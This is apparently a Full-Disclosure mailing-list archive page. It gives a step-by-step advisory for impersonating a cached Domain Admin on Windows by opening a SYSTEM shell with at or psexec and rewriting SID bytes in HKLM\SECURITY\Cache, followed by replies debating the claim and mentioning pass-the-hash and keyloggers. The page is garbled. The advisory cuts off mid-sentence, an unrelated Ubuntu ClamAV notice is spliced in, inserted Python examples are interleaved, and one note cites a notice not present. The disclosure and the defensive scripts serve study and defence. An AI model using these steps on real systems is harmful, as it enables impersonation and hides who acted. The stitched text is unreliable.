Flaw in Microsoft Domain Account Caching Allows Local Workstation
Admins to Temporarily Escalate Privileges and Login as Cached Domain
Admin Accounts

SUMMARY AND IMPACT:
All versions of Microsoft Windows operating systems allow real-time
modifications to the Active Directory cached accounts listing stored
on all Active Directory domain workstations and servers. This allows
domain users that have local administrator privileges on domain assets
to modify their cached accounts to masquerade as other domain users
that have logged in to those domain assets. This will allow local
administrators to temporarily escalate their domain privileges on
domain workstations or servers. If the local administrator masquerades
as an Active Directory Domain Admin account, the modified cached
account is now free to modify system files and user account profiles
using the identity of the Domain Admin's account. This includes
creating scripts to run as the Domain Admin account the next time that
they log in. All files created will not be linked to your domain
account in file and folder access lists. All security access lists
will only show the Domain Admin's account once you log out of the
modified cached account. This leads to a number of security issues
that I will not attempt to identify in the article. One major issue is
the lack of non-repudiation. Editing files and other actions will be
completed as another user account. Event log entries for object access
will only be created if administrators are auditing successful access
to files (This will lead to enormous event log sizes).

DETAILS:
Prerequisites to exploit:

#1: The user has a Domain User account that has administrative
privileges on his/her workstation (This is a common configuration for
both small and enterprise networks).
#2: The Microsoft Windows Active Directory domain has not disabled the
use of Group Policy Interactive logon: Number of previous logons to
cache (in case domain controller is not available). The default value
for this setting is 10 logons.
#3: A domain/enterprise/schema/privileged administrator has logged in
to the user's workstation at any time in the past (It would be very
difficult to not have some type of admin from the domain login to a
workstation for a number of reasons).

Use the following steps to exploit this vulnerability:

Step 1: Log in to your workstation using your Active Directory domain
account. This account only needs to have administrative access to your
workstation.
Step 2: Create an interactive scheduled task to run a minute after
creating it. This scheduled task brings up a command prompt as the NT
Authority\SYSTEM account on Windows XP, and 2003. 'at 11:24
/interactive cmd.exe'. If using Windows Vista, 7, or 2008 Server, the
attacker can use the psexec tool (psexec -i -s cmd.exe).
Step 3: Once the SYSTEM command prompt comes up, open regedit from the
command line.
Step 4: Browse to 'HKEY_LOCAL_MACHINE\SECURITY\Cache'
Step 5: The list of NL$1-10 records contain the cached active
directory domain account sessions. To identify which account is yours,
perform the following steps. Take note of all NL$ entries and entry
content. Change your domain account password. Leave the SYSTEM shell
and regedit application open. Log off the workstation, and then log
back in to your domain account. Refresh the NL$ list. The NL$ line
item that has been updated is your domain user's cached session.
Step 6: For this example, we will assume that your NL$ record is NL$4
Step 7: Double click on NL$4. Take note of the four hex characters
that are located in positions 1, 2, 3, and 4 on line 3 of the hex
data.
Step 8: For this example, the hex characters are 5a 04. This number
is the Active Directory octet string representation of your domain
account's objectSID (The user account unique section of your AD
Security Identifier).
Step 9: For this example, there is only one other cached account
listed in the NL$ listing (NL$3). Double click on NL$3. Take note of
the four hex characters that are located in positions 1, 2, 3, and 4
on line 3 of the hex data.
Step 10: For this example, the hex characters are 59 04. This user
account is Domain\DomainAdminAcct.
Step 11: Double click on NL$4. Replace your SID hex representation
5a 04, with DomainAdminAcct's SID hex representation 59 04.
Step 12: *Important* Disconnect all physical network connections from
the workstation.
Step 13: Log off of the domain account, then log back in to your domain account.
Step 14: You will now be logged in to your modified cached account
that is really the Domain Admin's account.
Step 15: You are now free to modify system files and user account
profiles using the identity of the Domain Admin's account. This
includes creating scripts to run as the Domain Admin account the next
time that 

[Full-disclosure] [USN-1031-1] ClamAV vulnerabilities

2010-12-09 Thread Steve Beattie
===
Ubuntu Security Notice USN-1031-1 December 10, 2010
clamav vulnerabilities
CVE-2010-4260, CVE-2010-4261, CVE-2010-4479
===

A security issue affects the following Ubuntu releases:

Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 10.04 LTS:
  libclamav6  0.96.3+dfsg-2ubuntu1.0.10.04.2

Ubuntu 10.10:
  libclamav6  0.96.3+dfsg-2ubuntu1.2

In general, a standard system update will make all the necessary changes.

Details follow:

Arkadiusz Miskiewicz and others discovered that the PDF processing
code in libclamav improperly validated input. This could allow a
remote attacker to craft a PDF document that could crash clamav or
possibly execute arbitrary code. (CVE-2010-4260, CVE-2010-4479)

It was discovered that an off-by-one error in the icon_cb function
in pe_icons.c in libclamav could allow an attacker to corrupt
memory, causing clamav to crash or possibly execute arbitrary code.
(CVE-2010-4261)

In the default installation, attackers would be isolated by the
clamav AppArmor profile.


Updated packages for Ubuntu 10.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.96.3+dfsg-2ubuntu1.0.10.04.2.diff.gz
  Size/MD5:   284066 72a7c4ff80f395c5dc8e4e7acd6fcd39

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.96.3+dfsg-2ubuntu1.0.10.04.2.dsc
  Size/MD5: 2323 d1d47147356bfaf610c993b8a9ed0530

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.96.3+dfsg.orig.tar.gz
  Size/MD5: 40572329 730c1af9badcee2bce4bbaf1cf8ea20a

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.96.3+dfsg-2ubuntu1.0.10.04.2_all.deb
  Size/MD5:   297088 745b7132479daa4dbdc5ca6cc023e0b2

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.96.3+dfsg-2ubuntu1.0.10.04.2_all.deb
  Size/MD5:  1295426 b03dae836f5cdf461c3a5f6a98a7363f

http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfiles_0.96.3+dfsg-2ubuntu1.0.10.04.2_all.deb
  Size/MD5:  5257088 aa5604ebd0f1e4646ce5d9e056513d11

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb
  Size/MD5:   424096 28c2f45042aafbf487e59ce679327bb3

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb
  Size/MD5: 22343058 abe9dff9f24f9f9b6b9f9faf5be2936b

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb
  Size/MD5:   313300 e88ecbee6c0f900b5854b2c1ca9b0771

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb
  Size/MD5:   335490 6d0081c84e0f46ee73bbf452309c03a3

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb
  Size/MD5:   217914 11b54c1f926069a93149ce28b7cf5325

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav6_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb
  Size/MD5:  3898290 0bd7e669232378b4b83a8bfdd0c8d716

http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.96.3+dfsg-2ubuntu1.0.10.04.2_amd64.deb
  Size/MD5:   345108 843a766d2909777cc88ccbf03468a6fa

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb
  Size/MD5:   410854 416f5d73612e5d37fbb904bb80dffb49

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb
  Size/MD5: 22043342 aa53f5f25b3a28b22315e17544bd7a6d

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb
  Size/MD5:   308344 d090653db3483820420e465513b7d858

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb
  Size/MD5:   327348 4cdcc06e3cfb9c241c7d6f560963116b

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb
  Size/MD5:   218084 752cc79037d5f08df096c528bc7eb8b6

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav6_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb
  Size/MD5:  3751526 c6dc2280d050c37f1f82ce62ba612cac

http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.96.3+dfsg-2ubuntu1.0.10.04.2_i386.deb
  Size/MD5:   338432 7156843fc6e5b7087d1fba58177ee81f

  armel architecture (ARM Architecture):
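
Both Ubuntu notices on this page (USN-1020-1 and USN-1031-1) list every package as a URL line followed by an indented "Size/MD5:" line. The following is an added example, not Ubuntu's own tooling, that parses that layout and checks a downloaded file against the listed size and digest. The advisory text in the block is a constructed excerpt whose two entries are copied from the ClamAV listing above; the file contents used for checking are constructed as well.

```python
import hashlib
import re
from typing import List, NamedTuple, Optional, Tuple

class Package(NamedTuple):
    url: str
    size: int
    md5: str

# Constructed excerpt in the USN layout: URL line, then "Size/MD5:" line.
# The two entries are copied from the ClamAV notice on this page.
SAMPLE_ADVISORY = """\
  Source archives:

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.96.3+dfsg-2ubuntu1.0.10.04.2.diff.gz
  Size/MD5:   284066 72a7c4ff80f395c5dc8e4e7acd6fcd39

http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.96.3+dfsg-2ubuntu1.0.10.04.2.dsc
  Size/MD5:     2323 d1d47147356bfaf610c993b8a9ed0530
"""

# "Size/MD5:" followed by a decimal size and a 32-hex-digit MD5.
SIZE_MD5_RE = re.compile(r"^\s*Size/MD5:\s*(\d+)\s+([0-9a-fA-F]{32})\s*$")

def parse_advisory(text: str) -> List[Package]:
    """Pair each URL line with the Size/MD5 line that follows it."""
    packages: List[Package] = []
    pending_url: Optional[str] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith(("http://", "https://")):
            pending_url = stripped          # remember until its Size/MD5 line arrives
            continue
        m = SIZE_MD5_RE.match(line)
        if m and pending_url is not None:
            packages.append(Package(pending_url, int(m.group(1)), m.group(2).lower()))
            pending_url = None
    return packages

def lookup(packages: List[Package], filename: str) -> Optional[Package]:
    """Find the advisory entry whose URL ends with the given file name."""
    for pkg in packages:
        if pkg.url.rsplit("/", 1)[-1] == filename:
            return pkg
    return None

def verify_file(data: bytes, expected: Package) -> Tuple[bool, str]:
    """Compare a downloaded file's size and MD5 against its advisory entry.

    Size is checked first: a truncated download fails fast without hashing.
    """
    if len(data) != expected.size:
        return False, f"size mismatch: got {len(data)}, advisory lists {expected.size}"
    actual = hashlib.md5(data).hexdigest()
    if actual != expected.md5:
        return False, f"md5 mismatch: got {actual}, advisory lists {expected.md5}"
    return True, "size and md5 match the advisory"

if __name__ == "__main__":
    pkgs = parse_advisory(SAMPLE_ADVISORY)
    entry = lookup(pkgs, "clamav_0.96.3+dfsg-2ubuntu1.0.10.04.2.dsc")
    # Constructed stand-in for a download that came back truncated.
    print(verify_file(b"-----BEGIN PGP SIGNED MESSAGE-----\n", entry))
```

Treat this as a corruption and truncation check, not an authenticity check: MD5 collisions are practical, and the digest is only as trustworthy as the channel the advisory text came through. Authenticity of the packages comes from the signed apt Release metadata that verifies on install.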



Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)

2010-12-09 Thread Thor (Hammer of God)
Why all the trouble?  Just change the log files directly when logged in as the 
local admin.  It's a whole lot simpler, and you don't even need the domain 
administrator to have interactively logged into your workstation.  Or is your 
point that local administrators are, um, local administrators?

t

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-
boun...@lists.grok.org.uk] On Behalf Of StenoPlasma @
www.ExploitDevelopment.com
Sent: Thursday, December 09, 2010 5:07 PM
To: bugt...@securityfocus.com; full-disclosure@lists.grok.org.uk
Cc: stenopla...@exploitdevelopment.com
Subject: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows
Local Workstation Admins to Temporarily Escalate Privileges and Login as
Cached Domain Admin Accounts (2010-M$-002)

--
www.ExploitDevelopment.com 2010-M$-002
--

TITLE:
Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to
Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts

SUMMARY AND IMPACT:
All versions of Microsoft Windows operating systems allow real-time
modifications to the Active Directory cached accounts listing stored on all
Active Directory domain workstations and servers. This allows domain users
that have local administrator privileges on domain assets to modify their
cached accounts to masquerade as other domain users that have logged in to
those domain assets. This will allow local administrators to temporarily
escalate their domain privileges on domain workstations or servers. If the
local administrator masquerades as an Active Directory Domain Admin account,
the modified cached account is now free to modify system files and user
account profiles using the identity of the Domain Admin's account. This
includes creating scripts to run as the Domain Admin account the next time
that they log in. All files created will not be linked to your domain
account in file and folder access lists. All security access lists will only
show the Domain Admin's account once you log out of the modified cached
account. This leads to a number of security issues that I will not attempt
to identify in the article. One major issue is the lack of non-repudiation.
Editing files and other actions will be completed as another user account.
Event log entries for object access will only be created if administrators
are auditing successful access to files (This will lead to enormous event
log sizes).

DETAILS:
Prerequisites to exploit:

#1: The user has a Domain User account that has administrative privileges on
his/her workstation (This is a common configuration for both small and
enterprise networks).
#2: The Microsoft Windows Active Directory domain has not disabled the use
of Group Policy Interactive logon: Number of previous logons to cache (in
case domain controller is not available). The default value for this
setting is 10 logons.
#3: A domain/enterprise/schema/privileged administrator has logged in to the
user's workstation at any time in the past (It would be very difficult to not
have some type of admin from the domain login to a workstation for a
number of reasons).

Use the following steps to exploit this vulnerability:

Step 1: Log in to your workstation using your Active Directory domain account.
This account only needs to have administrative access to your workstation.
Step 2: Create an interactive scheduled task to run a minute after creating it.
This scheduled task brings up a command prompt as the NT Authority\SYSTEM
account on Windows XP, and 2003. 'at 11:24 /interactive cmd.exe'. If using
Windows Vista, 7, or 2008 Server, the attacker can use the psexec tool (psexec
-i -s cmd.exe).
Step 3: Once the SYSTEM command prompt comes up, open regedit from the
command line.
Step 4: Browse to 'HKEY_LOCAL_MACHINE\SECURITY\Cache'
Step 5: The list of NL$1-10 records contain the cached active directory
domain account sessions. To identify which account is yours, perform the
following steps. Take note of all NL$ entries and entry content. Change your
domain account password. Leave the SYSTEM shell and regedit application
open. Log off the workstation, and then log back in to your domain account.
Refresh the NL$ list. The NL$ line item that has been updated is your domain
user's cached session.
Step 6: For this example, we will assume that your NL$ record is NL$4
Step 7: Double click on NL$4. Take note of the four hex characters that are
located in positions 1, 2, 3, and 4 on line 3 of the hex data.
Step 8: For this example, the hex characters are 5a 04. This number is the
Active Directory octet string representation of your domain account's
objectSID (The user account unique section of your AD Security Identifier).
Step 9: For this example, there is only one other cached account listed in the
NL$ listing (NL$3). Double click on NL$3. 
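Prerequisites #1 and #2 of the quoted advisory (a domain user who is a local administrator, and a cached-logon count left at its default of 10) are both things a defender can audit from a host's own configuration. The following is an added example and not code from any message in this thread. It parses constructed samples in the formats written by `secedit /export` and `net localgroup Administrators`; the registry value the policy maps to, CachedLogonsCount under the Winlogon key, is the real one, while the account names, the host data and the threshold of one cached logon are assumed values for the demonstration.

```python
# Audit two preconditions the advisory lists, using constructed inputs
# (not captured from a real host) in the formats produced by
# `secedit /export /cfg out.inf` and `net localgroup Administrators`.

# Constructed fragment of a secedit security-template export.  The
# "Interactive logon: Number of previous logons to cache" policy is stored
# as the REG_SZ value CachedLogonsCount (type code 1, data in quotes).
SECEDIT_EXPORT = """[Unicode]
Unicode=yes
[Registry Values]
MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\CachedLogonsCount=1,"10"
MACHINE\\System\\CurrentControlSet\\Control\\Lsa\\LimitBlankPasswordUse=4,1
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Constructed output of `net localgroup Administrators`; the domain name
# CORP and the member names are assumed.
NET_LOCALGROUP = """Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
CORP\\Domain Admins
CORP\\jsmith
The command completed successfully.
"""

CACHED_LOGONS_KEY = r"MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount"
OS_DEFAULT_CACHED_LOGONS = 10  # the default the advisory cites


def parse_secedit_values(text):
    """Return {registry path: (type code, data)} from the [Registry Values]
    section.  Each line is PATH=TYPE,DATA; REG_SZ data is double-quoted."""
    values = {}
    section = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "Registry Values" or "=" not in line:
            continue
        path, raw = line.split("=", 1)
        reg_type, _, data = raw.partition(",")
        values[path] = (int(reg_type), data.strip('"'))
    return values


def cached_logons_count(text):
    """Effective cached-logon count, falling back to the OS default when the
    export does not carry the policy at all."""
    values = parse_secedit_values(text)
    if CACHED_LOGONS_KEY not in values:
        return OS_DEFAULT_CACHED_LOGONS
    return int(values[CACHED_LOGONS_KEY][1])


def parse_local_admins(text):
    """Member names listed between the dashed separator and the trailing
    status line of `net localgroup` output."""
    members = []
    in_members = False
    for line in text.splitlines():
        if line.startswith("---"):
            in_members = True
            continue
        if in_members:
            if not line.strip() or line.startswith("The command completed"):
                break
            members.append(line.strip())
    return members


def audit(secedit_text, localgroup_text, max_cached=1, expected_admins=("Administrator",)):
    """Findings as plain strings; an empty list means both checks passed."""
    findings = []
    count = cached_logons_count(secedit_text)
    if count > max_cached:
        findings.append(f"CachedLogonsCount is {count}; lower it to {max_cached} "
                        f"(or 0 to disable caching on hosts that never work offline)")
    for member in parse_local_admins(localgroup_text):
        if member not in expected_admins:
            findings.append(f"unexpected member of local Administrators: {member}")
    return findings


if __name__ == "__main__":
    for finding in audit(SECEDIT_EXPORT, NET_LOCALGROUP):
        print(finding)
```

On the constructed sample the audit reports three findings: the default cache depth and the two domain principals in the local Administrators group. Whether `CORP\Domain Admins` belongs there is a policy decision, which is exactly the point Thor makes further down this thread; the check only makes the membership visible.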

Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)

2010-12-09 Thread StenoPlasma @ ExploitDevelopment
T,

My article describes how to use the SECURITY registry hive to trick the 
Microsoft operating system into performing an action that has a result 
that is not intended by the software developer.  This action is performed 
on the Active Directory logon account cache that regular local 
administrators should not have access to.  There are always other ways of 
doing things when it comes to this type of work.


Thank you,

-
StenoPlasma at ExploitDevelopment.com  
www.ExploitDevelopment.com
-

 Original Message 
 From: Thor (Hammer of God) t...@hammerofgod.com
 Sent: Thursday, December 09, 2010 6:07 PM
 To: stenopla...@exploitdevelopment.com 
stenopla...@exploitdevelopment.com, full-disclosure@lists.grok.org.uk 
full-disclosure@lists.grok.org.uk
 Subject: RE: [Full-disclosure] Flaw in Microsoft Domain Account Caching 
Allows Local Workstation Admins to Temporarily Escalate Privileges and 
Login as Cached Domain Admin Accounts (2010-M$-002)
 
 Why all the trouble?  Just change the log files directly when logged in 
as the local admin.  It's a whole lot simpler, and you don't even need the 
domain administrator to have interactively logged into your workstation.  
Or is your point that local administrators are, um, local administrators?
 
 t
 

Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)

2010-12-09 Thread Thor (Hammer of God)
What do you mean by regular local administrator?  You're a local admin, or 
you're not.  There are not degrees of local admin.  Why are you under the 
impression that there are things on a local system that the local admin should 
not have access to?  They can do anything they want to by design.  Are you 
under the impression that the Domain Administrator has different permissions on 
a local machine than the local administrator does?   The only reason a Domain 
Admin has admin rights by default on a domain workstation is because they 
simply belong to the local Administrators group.  If I, as a local admin, 
remove the domain admin account from my local Administrators group, then they 
will not be local admins.  In fact, I can just make the Domain Admin a guest 
on my workstation if I want to and there is nothing they can do about it. 

Sorry to be the bearer of bad news for you, but the local admin can do what 
they want to by design, and there is nothing that was not intended by the 
software developer here.  This is, of course, why the people at MSFT dismissed 
it as noted.

t

-Original Message-
From: StenoPlasma @ ExploitDevelopment 
[mailto:stenopla...@exploitdevelopment.com] 
Sent: Thursday, December 09, 2010 6:13 PM
To: Thor (Hammer of God); full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows 
Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached 
Domain Admin Accounts (2010-M$-002)

T,

My article describes how to use the SECURITY registry hive to trick the 
Microsoft operating system into performing an action that has a result that is 
not intended by the software developer.  This action is performed on the Active 
Directory logon account cache that regular local administrators should not have 
access to.  There are always other ways of doing things when it comes to this 
type of work.


Thank you,

-
StenoPlasma at ExploitDevelopment.com
www.ExploitDevelopment.com
-


Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)

2010-12-09 Thread Thor (Hammer of God)
No rogue user, only administrators.  And no, if I remove domain accounts 
from my local system (again, as administrator) then I can avoid having GP 
change anything.  Hell, I could put deny permission on the entire registry if I 
wanted to.  There's no magic about domain admins - they're just another 
account that has default ACLs set.  The local admin can always change it.  

If you need repudiation, don't let people be local admins.  Plain and simple.  
This is why many audits (SOX, SAS70, etc) require that all administrators be 
accounted for (change logs, etc) for access...

t

-Original Message-
From: Mike Hale [mailto:eyeronic.des...@gmail.com] 
Sent: Thursday, December 09, 2010 7:20 PM
To: Thor (Hammer of God)
Cc: stenopla...@exploitdevelopment.com; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows 
Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached 
Domain Admin Accounts (2010-M$-002)

In fact, I can just make the Domain Admin a guest on my workstation if I 
want to and there is nothing they can do about it.
With the caveat that they can re-add themselves using GP anytime they want...but 
you know.  I just wanted to throw that out there.

I think the key vulnerability in this is the non-repudiation one the OP 
mentioned.  Being able to run stuff under the domain admin's account is 
something a rogue user could potentially abuse.

I don't think this issue is particularly critical, but something a good admin 
should be aware of, IMO.


Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)

2010-12-09 Thread Mike Vasquez
You can dump the local cached hashes, take a domain admin's, and use a pass-
the-hash attack, which has been around for a while, such as:  Hernan Ochoa /
http://oss.coresecurity.com/projects/pshtoolkit.htm

I don't see this being any more concerning.  Whatever you do in the above
is under the other account.  Granted, I may be missing something, so
enlighten me.


 -Original Message-
 From: Mike Hale [mailto:eyeronic.des...@gmail.com]
 Sent: Thursday, December 09, 2010 7:20 PM
 To: Thor (Hammer of God)
 Cc: stenopla...@exploitdevelopment.com; full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching
 Allows Local Workstation Admins to Temporarily Escalate Privileges and Login
 as Cached Domain Admin Accounts (2010-M$-002)

 In fact, I can just make the Domain Admin a guest on my workstation if I
 want to and there is nothing they can do about it.
 With the caveat that they can re-add themselves using GP anytime they
 want...but you know.  I just wanted to throw that out there.

 I think the key vulnerability in this is the non-repudiation one the OP
 mentioned.  Being able to run stuff under the domain admin's account is
 something a rogue user could potentially abuse.

 I don't think this issue is particularly critical, but something a good
 admin should be aware of, IMO.


Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)

2010-12-09 Thread Marsh Ray
On 12/09/2010 09:36 PM, Mike Vasquez wrote:
 You can dump the local cached hashes, take a domain admins,

My understanding is that after the target user has logged off, the 
hashes which remain are only sufficient to validate a correct password. 
I.e., they're like the classic /etc/passwd hashes but with decent salts. 
They could be used for dictionary attacks, but not with precomputed 
rainbow tables.

 and use a
 pass the hash attack, which has been around for a while, such as:
 Hernan Ochoa / http://oss.coresecurity.com/projects/pshtoolkit.htm

My understanding is that PTH is a technique allowing you to easily use a 
different kind of hash. The password-equivalent kind that would be 
copied from the credentials of a live logged-in session. In that sense, 
PTH on its own may not meet the formal definition of an 'attack', since 
you still need a way to capture the password-equivalent.

 I don't see this being any more concerning.  Whatever you do in the
 above, is under the other account.  Granted, I may be missing something,
 so enlighten me.

If you're a local admin, you can replace explorer.exe and access 
resources with the credentials of the logged-in user.

If you're a local admin, you can install a keylogger and trivially 
capture anyone's freaking plaintext password (local console or RDP 
sessions).

So don't type your Domain Admin password into an untrusted system. Duh!

Note that any system to which an untrusted party has unsupervised 
physical access is untrusted.

- Marsh
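Thor's point that administrators must be accounted for in audit logs and Marsh's advice not to type a Domain Admin password into an untrusted system both reduce to evidence in the Security log: which privileged accounts have logged on interactively to which workstations (that is what populates the NL$ entries the advisory edits), and whether anything other than the LSA itself has written to HKLM\SECURITY\Cache. The following is an added example, not code from anyone in this thread. It runs both checks over constructed records shaped like parsed 4624 (logon) and 4657 (registry value modified) events; the account and host names, the privileged-account list and the exclusion of lsass.exe are assumptions, and the 4657 records only exist on a host where a SACL audits writes to the Cache key, in line with the advisory's own remark that object-access auditing has to be switched on.

```python
# Detection logic over constructed Security-log records.  Two signals:
#  1. interactive-style 4624 logons by privileged domain accounts, which
#     create or refresh a cached-credential entry on that workstation;
#  2. 4657 registry-value modifications under \REGISTRY\MACHINE\SECURITY\Cache
#     by any process other than the LSA (lsass.exe), which rewrites the NL$
#     entries itself at every logon and is therefore expected noise.

# Assumed privileged accounts (lower-cased for comparison); in practice this
# list would be generated from Domain Admins / Enterprise Admins membership.
PRIVILEGED_ACCOUNTS = {"corp\\da-jdoe", "corp\\administrator"}

# 4624 LogonType values that involve the workstation's credential cache.
INTERACTIVE_LOGON_TYPES = {2: "Interactive", 10: "RemoteInteractive", 11: "CachedInteractive"}

# Constructed sample records; field names follow the Security-log XML schema.
EVENTS = [
    {"EventID": 4624, "Computer": "WS01.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "jsmith", "LogonType": 2},
    {"EventID": 4624, "Computer": "WS01.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "da-jdoe", "LogonType": 10},
    {"EventID": 4624, "Computer": "WS01.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "da-jdoe", "LogonType": 3},  # network logon: no cache entry
    {"EventID": 4624, "Computer": "WS02.corp.example", "TargetDomainName": "CORP",
     "TargetUserName": "da-jdoe", "LogonType": 11},
    {"EventID": 4657, "Computer": "WS01.corp.example", "SubjectUserName": "SYSTEM",
     "ProcessName": "C:\\Windows\\regedit.exe",
     "ObjectName": "\\REGISTRY\\MACHINE\\SECURITY\\Cache", "ObjectValueName": "NL$3"},
    {"EventID": 4657, "Computer": "WS01.corp.example", "SubjectUserName": "SYSTEM",
     "ProcessName": "C:\\Windows\\System32\\lsass.exe",
     "ObjectName": "\\REGISTRY\\MACHINE\\SECURITY\\Cache", "ObjectValueName": "NL$4"},
]


def privileged_interactive_logons(events):
    """(computer, account, logon kind) for every cache-relevant 4624 logon by
    a privileged account.  Each hit is a host whose NL$ cache now holds that
    account, i.e. prerequisite #3 of the advisory is satisfied there."""
    hits = []
    for e in events:
        if e.get("EventID") != 4624:
            continue
        kind = INTERACTIVE_LOGON_TYPES.get(e.get("LogonType"))
        account = f"{e['TargetDomainName']}\\{e['TargetUserName']}"
        if kind and account.lower() in PRIVILEGED_ACCOUNTS:
            hits.append((e["Computer"], account, kind))
    return hits


def cache_tampering(events):
    """(computer, subject, value name, process) for every 4657 write under
    SECURITY\\Cache that did not come from the LSA process."""
    hits = []
    for e in events:
        if e.get("EventID") != 4657:
            continue
        if "security\\cache" not in e.get("ObjectName", "").lower():
            continue
        if e.get("ProcessName", "").lower().endswith("\\lsass.exe"):
            continue  # LSA maintaining the cache on logon: expected
        hits.append((e["Computer"], e.get("SubjectUserName"),
                     e.get("ObjectValueName"), e.get("ProcessName")))
    return hits


if __name__ == "__main__":
    for computer, account, kind in privileged_interactive_logons(EVENTS):
        print(f"{computer}: {account} logged on ({kind}); cached credentials now present")
    for computer, subject, value, proc in cache_tampering(EVENTS):
        print(f"{computer}: {value} rewritten by {proc} as {subject}")
```

The logon check turns Marsh's advice into something measurable: every hit is a workstation where a Domain Admin password has been typed and a cached entry left behind. The tampering check is only as good as the SACL on the key, and it deliberately ignores lsass.exe, since the advisory itself relies on the LSA refreshing an NL$ entry at each logon; a SYSTEM-context regedit.exe writing NL$ values is the signal worth paging on.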

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/